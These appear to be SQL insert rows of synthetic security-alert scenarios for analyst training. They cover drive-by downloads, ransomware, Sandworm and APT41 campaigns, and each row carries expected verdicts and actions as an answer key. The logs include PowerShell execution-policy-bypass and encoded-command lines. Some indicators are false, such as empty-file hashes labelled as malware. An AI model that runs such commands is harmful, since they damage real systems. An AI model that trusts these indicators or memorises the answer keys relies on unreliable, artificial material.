(520, 'Suspicious Network Traffic Detected', 'medium', 'Network Intrusion Detection System (NIDS)', 'Unusual traffic patterns have been detected originating from a popular news site, indicating a potential drive-by download attempt aimed at gaining initial access.', 'Drive-by Download', 'T1189', 1, 'new', NULL, '{\"timestamp\":\"2023-09-15T14:23:45Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"http_request\":{\"method\":\"GET\",\"url\":\"http://news.example.com/malicious.js\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"referrer\":\"http://news.example.com/home\"},\"malware_hash\":\"3a5c4f89d1b2e5f4c3b2a8e1e6f4b3c4\",\"filename\":\"malicious.js\"}', '2026-01-06 01:39:37', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host possibly compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"IP associated with previous drive-by download activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://news.example.com/malicious.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"URL hosts a known malicious script.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3a5c4f89d1b2e5f4c3b2a8e1e6f4b3c4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Analysis\",\"verdict\":\"suspicious\",\"details\":\"JavaScript file with obfuscated code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(521, 'Unverified Flash Update Executed', 'high', 'Endpoint Detection and Response (EDR)', 'A fake Adobe Flash update was executed on the endpoint, leading to the installation of a ransomware payload. The operation is part of a broader campaign aiming to deploy ransomware via social engineering tactics.', 'Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-5G9H1F2\",\"user\":\"john_doe\",\"process_name\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\fake_flash_update.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"src_ip\":\"102.54.98.112\",\"internal_ip\":\"192.168.1.45\",\"file_path\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\\",\"event_type\":\"Execution\",\"description\":\"A suspicious application resembling Adobe Flash Player was executed, which is known to deploy ransomware payloads.\"}', '2026-01-06 01:39:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"fake_flash_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known ransomware delivery mechanism disguised as Adobe Flash update.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"102.54.98.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to known C2 servers.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the affected machine.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(522, 'DiskCryptor Ransomware Detected', 'high', 'File Integrity Monitoring', 'DiskCryptor has been activated on the victim\'s machine, initiating encryption of the hard drive and establishing ransomware persistence.', 'Persistence', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:36Z\",\"event_id\":\"FIM-2023-5698\",\"file_path\":\"C:\\\\Program Files\\\\DiskCryptor\\\\dcinst.exe\",\"file_hash\":\"8f14e45fceea167a5a36dedd4bea2543\",\"user\":\"compromised_user\",\"internal_ip\":\"192.168.1.105\",\"external_ip\":\"203.0.113.45\",\"event_type\":\"file_change\",\"description\":\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\",\"additional_info\":{\"protocol\":\"HTTPS\",\"connection_status\":\"Active\"}}', '2026-01-06 01:39:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"8f14e45fceea167a5a36dedd4bea2543\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as DiskCryptor ransomware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"dcinst.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Analysis\",\"verdict\":\"suspicious\",\"details\":\"Common filename used by DiskCryptor ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account showing unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(523, 'Unauthorized SMB Traffic Observed', 'high', 'Network Traffic Analysis', 'An unauthorized SMB traffic pattern was detected indicating possible lateral movement within the network. The activity was flagged due to the use of known ransomware tactics to spread laterally across the network, utilizing the SMB protocol.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T13:45:00Z\",\"event_id\":\"SMB-ALERT-004\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.25\",\"attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"detected_filename\":\"ransomware_payload.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"john_doe\",\"action\":\"File Transfer\",\"status\":\"Suspicious\"}', '2026-01-06 01:39:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host receiving unauthorized SMB traffic.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP linked to ransomware distribution.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"malicious\",\"details\":\"File named associated with ransomware operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(524, 'Encrypted Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) System', 'Anomalous outbound traffic detected from an internal host to a known malicious IP. The traffic pattern suggests an attempt to exfiltrate encrypted files, which could potentially be used for ransom. The files in question were detected on host 192.168.1.23 and attempted to connect to external IP 203.0.113.45.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_source\":\"DLP System\",\"internal_ip\":\"192.168.1.23\",\"external_ip\":\"203.0.113.45\",\"detected_files\":[{\"filename\":\"confidential_data.enc\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}],\"username\":\"jsmith\",\"action\":\"attempted_exfiltration\",\"network_protocol\":\"HTTPS\",\"file_size\":\"15MB\"}', '2026-01-06 01:39:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to encrypted file detected during exfiltration attempt.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.enc\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_dlp\",\"verdict\":\"suspicious\",\"details\":\"Filename indicative of sensitive encrypted data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jsmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"employee_directory\",\"verdict\":\"clean\",\"details\":\"Username of the individual using the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(525, 'Initial Breach Detected: Unauthorized Network Access', 'high', 'Network Traffic Analysis', 'The attackers exploited a vulnerability in the event\'s ticketing system to enter the network. This marks the first step in their infiltration, indicating a sophisticated approach to gaining a foothold within the target\'s network.', 'Initial Access', 'T1190 - Exploit Public-Facing Application', 1, 'new', 1, '{\"timestamp\":\"2023-10-15T14:56:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"request_url\":\"https://event.ticketing.com/login\",\"exploit_used\":\"CVE-2023-XXXX\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"exploit_payload.bin\",\"username\":\"compromised_user\"}', '2026-01-06 01:44:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by initial access.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Sandworm.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit_payload.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in exploitation attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual login activity detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(526, 'Malicious Script Execution: Ceremony Systems Compromised', 'high', 'Endpoint Detection and Response (EDR)', 'A carefully crafted script was executed on key systems involved in the ceremony, initiating a sequence of disruptions. The script is linked to known Sandworm TTPs, aiming to deploy destructive malware within the ceremony\'s IT infrastructure.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:23Z\",\"hostname\":\"ceremony-server-01\",\"username\":\"admin_ceremony\",\"process\":\"/usr/bin/powershell\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\Public\\\\malicious_script.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"internal_ip\":\"10.10.5.23\",\"external_ip\":\"185.143.223.101\",\"filename\":\"malicious_script.ps1\",\"process_id\":4721,\"malware_family\":\"Olympic Destroyer\"}', '2026-01-06 01:44:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.10.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.143.223.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"External IP address associated with known Sandworm operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Olympic Destroyer malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Script file executed on the server, related to the malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(527, 'Persistence Mechanism Activated: Backdoors Installed', 'high', 'System Logs', 'The threat actors associated with the Sandworm group have successfully installed backdoors on multiple systems within the network. This action is part of their persistence strategy to maintain access even if initial access vectors are mitigated. The logs indicate suspicious activity from an external IP address linked with known malicious activity.', 'Persistence', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":4625,\"source_ip\":\"185.92.220.33\",\"username\":\"compromised_user\",\"command_executed\":\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\",\"file_created\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"file_hash\":\"2c1743a391305fbf367df8e4f069f9f9\",\"internal_ip\":\"192.168.1.15\"}', '2026-01-06 01:44:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Sandworm group activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"User account observed in unusual activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2c1743a391305fbf367df8e4f069f9f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known backdoor executable\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host showing signs of compromise\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(528, 'Lateral Movement: Spreading Through Critical Systems', 'high', 'Internal Network Monitoring', 'The threat actor is engaging in lateral movement within the network, targeting critical systems essential for the ceremony\'s operation. The objective is to identify and disrupt key systems, potentially using malware associated with known destructive campaigns.', 'Lateral Movement', 'T1550: Use Alternate Authentication Material', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.10.25\",\"dst_ip\":\"192.168.1.100\",\"src_port\":445,\"dst_port\":135,\"protocol\":\"SMB\",\"username\":\"ceremony_admin\",\"file_accessed\":\"Olympic_Destroyer.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"external_malicious_ip\":\"203.0.113.45\"}', '2026-01-06 01:44:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_db\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_asset_db\",\"verdict\":\"internal\",\"details\":\"Critical internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Olympic_Destroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known malware associated with Olympic Destroyer campaign.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Olympic Destroyer malware.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Sandworm activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(529, 'Data Exfiltration: Sensitive Information Targeted', 'high', 'Data Loss Prevention (DLP)', 'In a final move, data is exfiltrated, possibly containing sensitive information that can be leveraged in future operations or sold on the black market. The threat actor utilized a compromised internal server to transmit sensitive documents to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:08Z\",\"internal_source_ip\":\"192.168.45.22\",\"external_destination_ip\":\"203.0.113.57\",\"user\":\"jdoe\",\"exfiltrated_files\":[\"confidential_report.pdf\",\"financial_summary.xlsx\"],\"malware_hash\":\"4a8a08f09d37b73795649038408b5f33\",\"protocol\":\"HTTPS\",\"destination_port\":443,\"alert_id\":\"DLP-EXFIL-20231015-001\",\"detected_by\":\"Company DLP System\",\"associated_campaign\":\"Olympic Destroyer\"}', '2026-01-06 01:44:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exfiltration attempts by Sandworm APT\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.45.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Compromised internal server used for data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4a8a08f09d37b73795649038408b5f33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with Sandworm campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention Logs\",\"verdict\":\"suspicious\",\"details\":\"File flagged during exfiltration attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(530, 'Initial Access: ASUS Update Utility Compromised', 'critical', 'Network Traffic Analysis', 'APT41 has compromised the ASUS Live Update utility, enabling malware distribution via a supply chain attack. This can potentially allow the threat actor to infiltrate systems that use the ASUS update service.', 'Supply Chain Attack', 'T1195.002', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-25T14:23:05Z\",\"event_type\":\"network_connection\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"ASUSUpdate.exe\",\"file_hash\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"user\":\"jsmith\",\"action\":\"connection_attempt\",\"status\":\"success\",\"direction\":\"outbound\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Source IP is from an internal network range.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feeds\",\"verdict\":\"malicious\",\"details\":\"Destination IP is associated with APT41 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash corresponds to a known variant of malware used in ASUS supply chain attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ASUSUpdate.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"vendor_security_advisory\",\"verdict\":\"suspicious\",\"details\":\"File name is associated with the compromised ASUS update utility.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(531, 'Execution: Malicious Payload Deployment', 'high', 'Endpoint Detection and Response', 'The infected update utility executes the malicious payload on target machines, setting the stage for further exploitation.', 'Malware Execution', 'T1059: Command and Scripting Interpreter', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-05T14:22:39Z\",\"event_id\":\"E123456\",\"source_ip\":\"203.0.113.15\",\"internal_ip\":\"192.168.1.45\",\"user\":\"jdoe\",\"process_name\":\"update.exe\",\"file_path\":\"C:\\\\Program Files\\\\Update\\\\update.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"execute\",\"description\":\"Malicious payload executed by compromised update utility.\",\"os\":\"Windows 10\",\"username\":\"jdoe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with malware used in APT41 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"User account of the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(532, 'Persistence: Establishing Backdoor Access', 'high', 'System Logs', 'APT41 has successfully installed a backdoor on the targeted system to ensure continued access. The backdoor was detected through analysis of system logs, indicating a connection to a known malicious IP and the presence of a suspicious executable file in the system.', 'Backdoor Installation', 'T1078 - Valid Accounts', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-11T15:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"process_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Execution\",\"status\":\"Failed Logon\",\"logon_type\":\"3\",\"authentication_package\":\"NTLM\",\"network_address\":\"10.0.0.55\",\"logon_guid\":\"{12345678-1234-5678-1234-567812345678}\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 associated IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Account used in multiple logon attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with backdoor executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
